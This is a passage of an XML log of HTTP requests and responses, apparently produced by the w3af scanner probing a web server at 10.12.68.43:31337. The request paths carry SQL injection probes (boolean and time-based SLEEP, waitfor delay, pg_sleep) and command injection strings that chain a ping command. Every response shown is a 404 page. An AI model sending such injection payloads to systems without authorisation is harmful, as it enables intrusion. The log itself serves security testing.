                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="817">
                <http-request>
                    <status>POST http://10.12.68.43:31337/Fy0heGPq HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="826">
                <http-request>
                    <status>POST http://10.12.68.43:31337/31%27+AND+%2731%27%3D%2732 HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="840">
                <http-request>
                    <status>POST http://10.12.68.43:31337/rxd0s%3C%2F-%3Erxd0s%2F%2Arxd0s%22rxd0srxd0s%27rxd0srxd0s%60rxd0srxd0s+%3D HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="841">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%27%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="842">
                <http-request>
                    <status>POST http://10.12.68.43:31337/31+OR+31%3D31+ HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="845">
                <http-request>
                    <status>POST http://10.12.68.43:31337/h8N4Qgrk HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="851">
                <http-request>
                    <status>POST http://10.12.68.43:31337/31+AND+31%3D32+ HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="854">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%26%26%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="877">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%27%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="885">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%7Cping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="906">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%27%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="912">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%7Cping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="927">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1+or+SLEEP%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="932">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%7C%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="941">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%27+or+SLEEP%283%29+and+%271%27%3D%271 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="949">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%3Bping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="956">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%22+or+SLEEP%283%29+and+%221%22%3D%221 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="968">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%3Bping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="974">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1+or+pg_sleep%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="984">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%3B%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
